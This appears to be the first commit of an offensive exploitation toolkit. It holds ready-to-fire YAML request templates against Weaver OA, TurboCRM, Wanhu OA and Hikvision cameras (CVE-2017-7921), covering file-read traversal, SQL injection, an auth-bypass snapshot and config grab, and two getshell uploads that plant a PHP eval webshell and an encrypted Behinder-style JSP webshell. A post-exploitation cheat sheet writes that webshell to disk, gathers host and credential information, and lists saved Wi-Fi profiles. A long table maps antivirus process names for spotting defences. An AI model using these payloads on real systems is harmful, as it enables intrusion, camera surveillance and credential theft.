Add files via upload

首次上传

poc/fanwei/fileread1.yml

@@ -0,0 +1,20 @@
+method: GET
+url: $
+tlsversion: HTTP/1.1
+uri: /weaver/org.springframework.web.servlet.ResourceServlet
+param: resource=/WEB-INF/prop/weaver.properties
+data: |
+ 
+others: 
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
+    Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
+    Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'
+    Accept-Encoding: gzip, deflate
+    Connection: keep-alive
+    Upgrade-Insecure-Requests: 1
+condition: 
+    words: ecology.url
+    time: 
+expinformation: 
+    expname: 泛微读取文件-1
+    expdescribe: 泛微读取文件,/weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties

poc/fanwei/fileread2.yml

@@ -0,0 +1,20 @@
+method: GET
+url: $
+tlsversion: HTTP/1.1
+uri: /weaver/ln.FileDownload
+param: fpath=../ecology/WEB-INF/prop/weaver.properties
+data: |
+ 
+others: 
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
+    Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
+    Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'
+    Accept-Encoding: gzip, deflate
+    Connection: keep-alive
+    Upgrade-Insecure-Requests: 1
+condition: 
+    words: ecology.url
+    time: 
+expinformation: 
+    expname: 泛微读取文件-2
+    expdescribe: 泛微读取文件,/weaver/ln.FileDownload?fpath=../ecology/WEB-INF/prop/weaver.properties

poc/fanwei/sqlinject1.yml

@@ -0,0 +1,21 @@
+method: GET
+url: $
+tlsversion: HTTP/1.1
+uri: /js/hrm/getdata.jsp
+param: cmd=forgotPasswordCheck&type=1&loginid=sysadmin111111%27%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0aunion+select+ascii(1),%272%27,%273%27,%274%27,%275%27,%276%27+where+%27%27=%27
+data: |
+ 
+others: 
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
+    Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
+    Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'
+    Accept-Encoding: gzip, deflate
+    Connection: keep-alive
+    Upgrade-Insecure-Requests: 1
+condition: 
+    words: >
+        "id":49
+    time: 
+expinformation: 
+    expname: 泛微注入-2
+    expdescribe: 泛微注入,/js/hrm/getdata.jsp

poc/hikvision/CVE-2017-7921.yml

@@ -0,0 +1,20 @@
+method: GET
+url: $
+tlsversion: HTTP/1.1
+uri: /onvif-http/snapshot
+param: auth=YWRtaW46MTEK
+data: |
+
+others:
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
+    Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
+    Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'
+    Accept-Encoding: gzip, deflate
+    Connection: keep-alive
+    Upgrade-Insecure-Requests: 1
+condition:
+    words: Content-Type:image/jpeg
+    time:
+expinformation:
+    expname: hikvision
+    expdescribe: hikvision/CVE-2017-7921.yml,返回的为查看的图像(访问该链接可以直接查看海康威视的监控截图/onvif-http/snapshot?auth=YWRtaW46MTEK;访问该链接可以直接查看海康威视的用户列表/Security/users?auth=YWRtaW46MTEK;访问该链接可以直接获取海康威视的配置文件/System/configurationFile?auth=YWRtaW46MTEK)

poc/turbocrm/fileread.yml

@@ -0,0 +1,19 @@
+method: GET
+url: $
+tlsversion: HTTP/1.1
+uri: /ajax/getemaildata.php
+param: DontCheckLogin=1&filePath=c:/windows/system32/drivers/etc/hosts
+data: |
+ 
+others: 
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
+    Accept: text/html,application/xhtml+xml,application/xml;q
+    Accept-Language: zh-CN,zh;q
+    Accept-Encoding: gzip, deflate
+    Upgrade-Insecure-Requests: 1
+condition: 
+    words: Copyright
+    time: 
+expinformation: 
+    expname: TurboCRM文件读取
+    expdescribe: TurboCRM文件读取,路径为/ajax/getemaildata.php

poc/turbocrm/getshell.yml

@@ -0,0 +1,35 @@
+method: POST
+url: $
+tlsversion: HTTP/1.1
+uri: /ajax/getemaildata.php
+param: DontCheckLogin=1
+data: |
+ -----------------------------344329421119612311021814993770
+ Content-Disposition: form-data; name="file"; filename="shell.php "
+ Content-Type: text/php
+ 
+ <?php
+ @eval(base64_decode(($_POST['x'])));
+ ?>
+ 
+ -----------------------------344329421119612311021814993770
+ Content-Disposition: form-data; name="upload"
+ 
+ upload
+ -----------------------------344329421119612311021814993770--
+others: 
+    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
+    Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
+    Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'
+    Accept-Encoding: gzip, deflate
+    Content-Type: 'multipart/form-data; boundary=---------------------------344329421119612311021814993770'
+    Content-Length: 386
+    Connection: keep-alive
+    Cookie: 'PHPSESSID=c7vlvgf1hhc8uat6r2nnu57333'
+    Upgrade-Insecure-Requests: 1
+condition: 
+    words: tmpfile
+    time: 
+expinformation: 
+    expname: TurboCRM任意文件上传
+    expdescribe: TurboCRM任意文件上传,路径为返回的tmpfile/mh70D7.tmp.mht换为tmpfile/upd70D6.tmp.php

poc/wanhu/frontgetshell.yml

@@ -0,0 +1,35 @@
+method: POST
+url: $
+tlsversion: HTTP/1.1
+uri: /defaultroot/officeserverservlet
+param:
+data: |
+  DBSTEP V3.0     185             0               611
+  DBSTEP=REJTVEVQ
+  OPTION=U0FWRUZJTEU=
+  RECORDID=
+  firstFilesize=dHJ1ZQ==
+  isDoc=dHJ1ZQ==
+  moduleType=aW5mb3JtYXRpb24=
+  FILETYPE=Ly4uLy4uL3B1YmxpYy9lZGl0L3RhMi5qc3A=
+  isViewOld=MQ==
+
+  <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
+  <%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>
+  <%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);
+  Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));
+  new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
+others:
+  User-Agent: Go-http-client/1.1
+  Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3'
+  Accept-Encoding: gzip, deflate
+  Accept-Language: 'zh-CN,zh;q=0.9,en;q=0.8'
+  Connection: close
+  Upgrade-Insecure-Requests: 1
+  Content-Length: 790
+condition: 
+    words: DBSTEP
+    time: 
+expinformation: 
+    expname: 万户getshell
+    expdescribe: 万户getshell，可能需要代理模式下进行使用，默认冰蝎马，密码为rebeyond

property/cmdlists.txt

@@ -0,0 +1,21 @@
+windows查找文件::::dir c:\ /s /b | find "win.ini"、dir c:\ /s /b | find "navicat.exe"、dir c:\ /s /b | find "finalshell.exe"
+
+linux查找文件::::find / -name passwd
+
+windows写文件::::echo ^<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%^> >> C:/x/x.jsp、、echo ^<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%^> >> C:/x/x.jsp、、echo ^<%if (request.getMethod().equals("POST")){String k="af8a6a25cc5bfb73";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%^> >> C:/x/x.jsp
+
+linux写文件::::echo xxxxx== |base64 -d > /var/www/html/1.jsp
+
+获取操作系统命令::::wmic OS get Caption,CSDVersion,OSArchitecture,Version
+
+主机收集::::查看rdp链接记录 cmdkey /list、查看dns记录 ipconfig /displaydns 、查看arp记录 arp -a
+
+根据进程查找进程文件::::wmic process where name="xxxx.exe" get processid,executablepath,name、wmic process where name="chrome.exe" list full
+
+查看当前系统是否有屏保保护，延迟是多少::::wmic desktop get screensaversecure,screensavertimeout
+
+查看当前系统是否是VMWARE::::wmic bios list full | find /i "vmware"
+
+显示系统中的曾经连接过的无线密码::::netsh wlan show profiles
+
+windows常用的系统变量::::查看当前用户目录%HOMEPATH、查看当前目录%CD%、列出用户共享主目录的网络路径%HOMESHARE%、 列出有效的当前登录会话的域名控制器名、列出了可执行文件的搜索路径%Path%、列出了处理器的芯片架构%PROCESSOR_ARCHITECTURE%、列出了Program Files文件夹的路径%ProgramFiles%、列出了当前登录的用户可用应用程序的默认临时目录%TEMP% and %TMP%、列出了当前登录的用户可用应用程序的默认临时目录%TEMP% and %TMP%、列出了包含用户帐号的域的名字%USERDOMAIN%、列出操作系统目录的位置%WINDIR%、返回“所有用户”配置文件的位置%ALLUSERSPROFILE%、返回处理器数目%NUMBER_OF_PROCESSORS%

property/config.properties

@@ -0,0 +1 @@
+pythonpath=python

property/exetest.txt

@@ -0,0 +1,530 @@
+"360tray.exe": "360安全卫士-实时保护",
+"360safe.exe": "360安全卫士-主程序",
+"ZhuDongFangYu.exe": "360安全卫士-主动防御",
+"360sd.exe": "360杀毒",
+"a2guard.exe": "a-squared杀毒",
+"ad-watch.exe": "Lavasoft杀毒",
+"cleaner8.exe": "The Cleaner杀毒",
+"vba32lder.exe": "vb32杀毒",
+"MongoosaGUI.exe": "Mongoosa杀毒",
+"CorantiControlCenter32.exe": "Coranti2012杀毒",
+"F-PROT.exe": "F-Prot AntiVirus",
+"CMCTrayIcon.exe": "CMC杀毒",
+"K7TSecurity.exe": "K7杀毒",
+"UnThreat.exe": "UnThreat杀毒",
+"CKSoftShiedAntivirus4.exe": "Shield Antivirus杀毒",
+"AVWatchService.exe": "VIRUSfighter杀毒",
+"ArcaTasksService.exe": "ArcaVir杀毒",
+"iptray.exe": "Immunet杀毒",
+"PSafeSysTray.exe": "PSafe杀毒",
+"nspupsvc.exe": "nProtect杀毒",
+"SpywareTerminatorShield.exe": "SpywareTerminator反间谍软件",
+"BKavService.exe": "Bkav杀毒",
+"MsMpEng.exe": "Microsoft Security Essentials",
+"SBAMSvc.exe": "VIPRE",
+"ccSvcHst.exe": "Norton杀毒",
+"f-secure.exe": "冰岛",
+"avp.exe": "Kaspersky",
+"KvMonXP.exe": "江民杀毒",
+"RavMonD.exe": "瑞星杀毒",
+"Mcshield.exe": "McAfee",
+"Tbmon.exe": "McAfee",
+"Frameworkservice.exe": "McAfee",
+"egui.exe": "ESET NOD32",
+"ekrn.exe": "ESET NOD32",
+"eguiProxy.exe": "ESET NOD32",
+"kxetray.exe": "金山毒霸",
+"knsdtray.exe": "可牛杀毒",
+"TMBMSRV.exe": "趋势杀毒",
+"avcenter.exe": "Avira(小红伞)",
+"avguard.exe": "Avira(小红伞)",
+"avgnt.exe": "Avira(小红伞)",
+"sched.exe": "Avira(小红伞)",
+"ashDisp.exe": "Avast网络安全",
+"rtvscan.exe": "诺顿杀毒",
+"ccapp.exe": "SymantecNorton",
+"NPFMntor.exe": "Norton杀毒软件",
+"ccSetMgr.exe": "赛门铁克",
+"ccRegVfy.exe": "Norton杀毒软件",
+"ksafe.exe": "金山卫士",
+"QQPCRTP.exe": "QQ电脑管家",
+"avgwdsvc.exe": "AVG杀毒",
+"QUHLPSVC.exe": "QUICK HEAL杀毒",
+"mssecess.exe": "微软杀毒",
+"SavProgress.exe": "Sophos杀毒",
+"SophosUI.exe": "Sophos杀毒",
+"SophosFS.exe": "Sophos杀毒",
+"SophosHealth.exe": "Sophos杀毒",
+"SophosSafestore64.exe": "Sophos杀毒",
+"SophosCleanM.exe": "Sophos杀毒",
+"fsavgui.exe": "F-Secure杀毒",
+"vsserv.exe": "比特梵德",
+"remupd.exe": "熊猫卫士",
+"FortiTray.exe": "飞塔",
+"safedog.exe": "安全狗",
+"parmor.exe": "木马克星",
+"Iparmor.exe.exe": "木马克星",
+"beikesan.exe": "贝壳云安全",
+"KSWebShield.exe": "金山网盾",
+"TrojanHunter.exe": "木马猎手",
+"GG.exe": "巨盾网游安全盾",
+"adam.exe": "绿鹰安全精灵",
+"AST.exe": "超级巡警",
+"ananwidget.exe": "墨者安全专家",
+"AVK.exe": "AntiVirusKit",
+"avg.exe": "AVG Anti-Virus",
+"spidernt.exe": "Dr.web",
+"avgaurd.exe": "Avira Antivir",
+"vsmon.exe": "Zone Alarm",
+"cpf.exe": "Comodo",
+"outpost.exe": "Outpost Firewall",
+"rfwmain.exe": "瑞星防火墙",
+"kpfwtray.exe": "金山网镖",
+"FYFireWall.exe": "风云防火墙",
+"MPMon.exe": "微点主动防御",
+"pfw.exe": "天网防火墙",
+"BaiduSdSvc.exe": "百度杀毒-服务进程",
+"BaiduSdTray.exe": "百度杀毒-托盘进程",
+"BaiduSd.exe": "百度杀毒-主程序",
+"SafeDogGuardCenter.exe": "安全狗",
+"safedogupdatecenter.exe": "安全狗",
+"safedogguardcenter.exe": "安全狗",
+"SafeDogSiteIIS.exe": "安全狗",
+"SafeDogTray.exe": "安全狗",
+"SafeDogServerUI.exe": "安全狗",
+"D_Safe_Manage.exe": "D盾",
+"d_manage.exe": "D盾",
+"yunsuo_agent_service.exe": "云锁",
+"yunsuo_agent_daemon.exe": "云锁",
+"HwsPanel.exe": "护卫神",
+"hws_ui.exe": "护卫神",
+"hws.exe": "护卫神",
+"hwsd.exe": "护卫神",
+"hipstray.exe": "火绒",
+"wsctrl.exe": "火绒",
+"usysdiag.exe": "火绒",
+"SPHINX.exe": "SPHINX防火墙",
+"bddownloader.exe": "百度卫士",
+"baiduansvx.exe": "百度卫士-主进程",
+"AvastUI.exe": "Avast!5主程序",
+"emet_agent.exe": "EMET",
+"emet_service.exe": "EMET",
+"firesvc.exe": "McAfee",
+"firetray.exe": "McAfee",
+"hipsvc.exe": "McAfee",
+"mfevtps.exe": "McAfee",
+"mcafeefire.exe": "McAfee",
+"scan32.exe": "McAfee",
+"shstat.exe": "McAfee",
+"vstskmgr.exe": "McAfee",
+"engineserver.exe": "McAfee",
+"mfeann.exe": "McAfee",
+"mcscript.exe": "McAfee",
+"updaterui.exe": "McAfee",
+"udaterui.exe": "McAfee",
+"naprdmgr.exe": "McAfee",
+"cleanup.exe": "McAfee",
+"cmdagent.exe": "McAfee",
+"frminst.exe": "McAfee",
+"mcscript_inuse.exe": "McAfee",
+"mctray.exe": "McAfee",
+"_avp32.exe": "卡巴斯基",
+"_avpcc.exe": "卡巴斯基",
+"_avpm.exe": "卡巴斯基",
+"aAvgApi.exe": "AVG",
+"ackwin32.exe": "已知杀软进程,名称暂未收录",
+"alertsvc.exe": "Norton AntiVirus",
+"alogserv.exe": "McAfee VirusScan",
+"anti-trojan.exe": "Anti-Trojan Elite",
+"arr.exe": "Application Request Route",
+"atguard.exe": "AntiVir",
+"atupdater.exe": "已知杀软进程,名称暂未收录",
+"atwatch.exe": "Mustek",
+"au.exe": "NSIS",
+"aupdate.exe": "Symantec",
+"auto-protect.nav80try.exe": "已知杀软进程,名称暂未收录",
+"autodown.exe": "AntiVirus AutoUpdater",
+"avconsol.exe": "McAfee",
+"avgcc32.exe": "AVG",
+"avgctrl.exe": "AVG",
+"avgemc.exe": "AVG",
+"avgrsx.exe": "AVG",
+"avgserv.exe": "AVG",
+"avgserv9.exe": "AVG",
+"avgw.exe": "AVG",
+"avkpop.exe": "G DATA SOFTWARE AG",
+"avkserv.exe": "G DATA SOFTWARE AG",
+"avkservice.exe": "G DATA SOFTWARE AG",
+"avkwctl9.exe": "G DATA SOFTWARE AG",
+"avltmain.exe": "Panda Software Aplication",
+"avnt.exe": "H+BEDV Datentechnik GmbH",
+"avp32.exe": "Kaspersky Anti-Virus",
+"avpcc.exe": " Kaspersky AntiVirus",
+"avpdos32.exe": " Kaspersky AntiVirus",
+"avpm.exe": " Kaspersky AntiVirus",
+"avptc32.exe": " Kaspersky AntiVirus",
+"avpupd.exe": " Kaspersky AntiVirus",
+"avsynmgr.exe": "McAfee",
+"avwin.exe": " H+BEDV",
+"bargains.exe": "Exact Advertising SpyWare",
+"beagle.exe": "Avast",
+"blackd.exe": "BlackICE",
+"blackice.exe": "BlackICE",
+"blink.exe": "micromedia",
+"blss.exe": "CBlaster",
+"bootwarn.exe": "Symantec",
+"bpc.exe": "Grokster",
+"brasil.exe": "Exact Advertising",
+"ccevtmgr.exe": "Norton Internet Security",
+"cdp.exe": "CyberLink Corp.",
+"cfd.exe": "Motive Communications",
+"cfgwiz.exe": " Norton AntiVirus",
+"claw95.exe": "已知杀软进程,名称暂未收录",
+"claw95cf.exe": "已知杀软进程,名称暂未收录",
+"clean.exe": "windows流氓软件清理大师",
+"cleaner.exe": "windows流氓软件清理大师",
+"cleaner3.exe": "windows流氓软件清理大师",
+"cleanpc.exe": "windows流氓软件清理大师",
+"cpd.exe": "McAfee",
+"ctrl.exe": "已知杀软进程,名称暂未收录",
+"cv.exe": "已知杀软进程,名称暂未收录",
+"defalert.exe": "Symantec",
+"defscangui.exe": "Symantec",
+"defwatch.exe": "Norton Antivirus",
+"doors.exe": "已知杀软进程,名称暂未收录",
+"dpf.exe": "已知杀软进程,名称暂未收录",
+"dpps2.exe": "PanicWare",
+"dssagent.exe": "Broderbund",
+"ecengine.exe": "已知杀软进程,名称暂未收录",
+"emsw.exe": "Alset Inc",
+"ent.exe": "已知杀软进程,名称暂未收录",
+"espwatch.exe": "已知杀软进程,名称暂未收录",
+"ethereal.exe": "RationalClearCase",
+"exe.avxw.exe": "已知杀软进程,名称暂未收录",
+"expert.exe": "已知杀软进程,名称暂未收录",
+"f-prot95.exe": "已知杀软进程,名称暂未收录",
+"fameh32.exe": "F-Secure",
+"fast.exe": " FastUsr",
+"fch32.exe": "F-Secure",
+"fih32.exe": "F-Secure",
+"findviru.exe": "F-Secure",
+"firewall.exe": "AshampooSoftware",
+"fnrb32.exe": "F-Secure",
+"fp-win.exe": " F-Prot Antivirus OnDemand",
+"fsaa.exe": "F-Secure",
+"fsav.exe": "F-Secure",
+"fsav32.exe": "F-Secure",
+"fsav530stbyb.exe": "F-Secure",
+"fsav530wtbyb.exe": "F-Secure",
+"fsav95.exe": "F-Secure",
+"fsgk32.exe": "F-Secure",
+"fsm32.exe": "F-Secure",
+"fsma32.exe": "F-Secure",
+"fsmb32.exe": "F-Secure",
+"gbmenu.exe": "已知杀软进程,名称暂未收录",
+"guard.exe": "ewido",
+"guarddog.exe": "ewido",
+"htlog.exe": "已知杀软进程,名称暂未收录",
+"htpatch.exe": "Silicon Integrated Systems Corporation",
+"hwpe.exe": "已知杀软进程,名称暂未收录",
+"iamapp.exe": "Symantec",
+"iamserv.exe": "Symantec",
+"iamstats.exe": "Symantec",
+"iedriver.exe": " Urlblaze.com",
+"iface.exe": "Panda Antivirus Module",
+"infus.exe": "Infus Dialer",
+"infwin.exe": "Msviewparasite",
+"intdel.exe": "Inet Delivery",
+"intren.exe": "已知杀软进程,名称暂未收录",
+"jammer.exe": "已知杀软进程,名称暂未收录",
+"kavpf.exe": "Kapersky",
+"kazza.exe": "Kapersky",
+"keenvalue.exe": "EUNIVERSE INC",
+"launcher.exe": "Intercort Systems",
+"ldpro.exe": "已知杀软进程,名称暂未收录",
+"ldscan.exe": "Windows Trojans Inspector",
+"localnet.exe": "已知杀软进程,名称暂未收录",
+"luall.exe": "Symantec",
+"luau.exe": "Symantec",
+"lucomserver.exe": "Norton",
+"mcagent.exe": "McAfee",
+"mcmnhdlr.exe": "McAfee",
+"mctool.exe": "McAfee",
+"mcupdate.exe": "McAfee",
+"mcvsrte.exe": "McAfee",
+"mcvsshld.exe": "McAfee",
+"mfin32.exe": "MyFreeInternetUpdate",
+"mfw2en.exe": "MyFreeInternetUpdate",
+"mfweng3.02d30.exe": "MyFreeInternetUpdate",
+"mgavrtcl.exe": "McAfee",
+"mgavrte.exe": "McAfee",
+"mghtml.exe": "McAfee",
+"mgui.exe": "BullGuard",
+"minilog.exe": "Zone Labs Inc",
+"mmod.exe": "EzulaInc",
+"mostat.exe": "WurldMediaInc",
+"mpfagent.exe": "McAfee",
+"mpfservice.exe": "McAfee",
+"mpftray.exe": "McAfee",
+"mscache.exe": "Integrated Search Technologies Spyware",
+"mscman.exe": "OdysseusMarketingInc",
+"msmgt.exe": "Total Velocity Spyware",
+"msvxd.exe": "W32/Datom-A",
+"mwatch.exe": "已知杀软进程,名称暂未收录",
+"nav.exe": "Reuters Limited",
+"navapsvc.exe": "Norton AntiVirus",
+"navapw32.exe": "Norton AntiVirus",
+"navw32.exe": "Norton Antivirus",
+"ndd32.exe": "诺顿磁盘医生",
+"neowatchlog.exe": "已知杀软进程,名称暂未收录",
+"netutils.exe": "已知杀软进程,名称暂未收录",
+"nisserv.exe": "Norton",
+"nisum.exe": "Norton",
+"nmain.exe": "Norton",
+"nod32.exe": "ESET Smart Security",
+"norton_internet_secu_3.0_407.exe": "已知杀软进程,名称暂未收录",
+"notstart.exe": "已知杀软进程,名称暂未收录",
+"nprotect.exe": "Symantec",
+"npscheck.exe": "Norton",
+"npssvc.exe": "Norton",
+"ntrtscan.exe": "趋势反病毒应用程序",
+"nui.exe": "已知杀软进程,名称暂未收录",
+"otfix.exe": "已知杀软进程,名称暂未收录",
+"outpostinstall.exe": "Outpost",
+"patch.exe": "趋势科技",
+"pavw.exe": "已知杀软进程,名称暂未收录",
+"pcscan.exe": "趋势科技",
+"pdsetup.exe": "已知杀软进程,名称暂未收录",
+"persfw.exe": "Tiny Personal Firewall",
+"pgmonitr.exe": "PromulGate SpyWare",
+"pingscan.exe": "已知杀软进程,名称暂未收录",
+"platin.exe": "已知杀软进程,名称暂未收录",
+"pop3trap.exe": "PC-cillin",
+"poproxy.exe": "NortonAntiVirus",
+"popscan.exe": "已知杀软进程,名称暂未收录",
+"powerscan.exe": "Integrated Search Technologies",
+"ppinupdt.exe": "已知杀软进程,名称暂未收录",
+"pptbc.exe": "已知杀软进程,名称暂未收录",
+"ppvstop.exe": "已知杀软进程,名称暂未收录",
+"prizesurfer.exe": "Prizesurfer",
+"prmt.exe": "OpiStat",
+"prmvr.exe": "Adtomi",
+"processmonitor.exe": "Sysinternals",
+"proport.exe": "已知杀软进程,名称暂未收录",
+"protectx.exe": "ProtectX",
+"pspf.exe": "已知杀软进程,名称暂未收录",
+"purge.exe": "已知杀软进程,名称暂未收录",
+"qconsole.exe": "Norton AntiVirus Quarantine Console",
+"qserver.exe": "Norton Internet Security",
+"rapapp.exe": "BlackICE",
+"rb32.exe": "RapidBlaster",
+"rcsync.exe": "PrizeSurfer",
+"realmon.exe": "Realmon ",
+"rescue.exe": "已知杀软进程,名称暂未收录",
+"rescue32.exe": "卡巴斯基互联网安全套装",
+"rshell.exe": "已知杀软进程,名称暂未收录",
+"rtvscn95.exe": "Real-time virus scanner ",
+"rulaunch.exe": "McAfee User Interface",
+"run32dll.exe": "PAL PC Spy",
+"safeweb.exe": "PSafe Tecnologia",
+"sbserv.exe": "Norton Antivirus",
+"scrscan.exe": "360杀毒",
+"sfc.exe": "System file checker",
+"sh.exe": "MKS Toolkit for Win3",
+"showbehind.exe": "MicroSmarts Enterprise Component ",
+"soap.exe": "System Soap Pro",
+"sofi.exe": "已知杀软进程,名称暂未收录",
+"sperm.exe": "已知杀软进程,名称暂未收录",
+"supporter5.exe": "eScorcher反病毒",
+"symproxysvc.exe": "Symantec",
+"symtray.exe": "Symantec",
+"tbscan.exe": "ThunderBYTE",
+"tc.exe": "TimeCalende",
+"titanin.exe": "TitanHide",
+"tvmd.exe": "Total Velocity",
+"tvtmd.exe": " Total Velocity",
+"vettray.exe": "eTrust",
+"vir-help.exe": "已知杀软进程,名称暂未收录",
+"vnpc3000.exe": "已知杀软进程,名称暂未收录",
+"vpc32.exe": "Symantec",
+"vpc42.exe": "Symantec",
+"vshwin32.exe": "McAfee",
+"vsmain.exe": "McAfee",
+"vsstat.exe": "McAfee",
+"wfindv32.exe": "已知杀软进程,名称暂未收录",
+"zapro.exe": "Zone Alarm",
+"zonealarm.exe": "Zone Alarm",
+"AVPM.exe": "Kaspersky",
+"A2CMD.exe": "Emsisoft Anti-Malware",
+"A2SERVICE.exe": "a-squared free",
+"A2FREE.exe": "a-squared Free",
+"ADVCHK.exe": "Norton AntiVirus",
+"AGB.exe": "安天防线",
+"AHPROCMONSERVER.exe": "安天防线",
+"AIRDEFENSE.exe": "AirDefense",
+"ALERTSVC.exe": "Norton AntiVirus",
+"AVIRA.exe": "小红伞杀毒",
+"AMON.exe": "Tiny Personal Firewall",
+"AVZ.exe": "AVZ",
+"ANTIVIR.exe": "已知杀软进程,名称暂未收录",
+"APVXDWIN.exe": "熊猫卫士",
+"ASHMAISV.exe": "Alwil",
+"ASHSERV.exe": "Avast Anti-virus",
+"ASHSIMPL.exe": "AVAST!VirusCleaner",
+"ASHWEBSV.exe": "Avast",
+"ASWUPDSV.exe": "Avast",
+"ASWSCAN.exe": "Avast",
+"AVCIMAN.exe": "熊猫卫士",
+"AVCONSOL.exe": "McAfee",
+"AVENGINE.exe": "熊猫卫士",
+"AVESVC.exe": "Avira AntiVir Security Service",
+"AVEVL32.exe": "已知杀软进程,名称暂未收录",
+"AVGAM.exe": "AVG",
+"AVGCC.exe": "AVG",
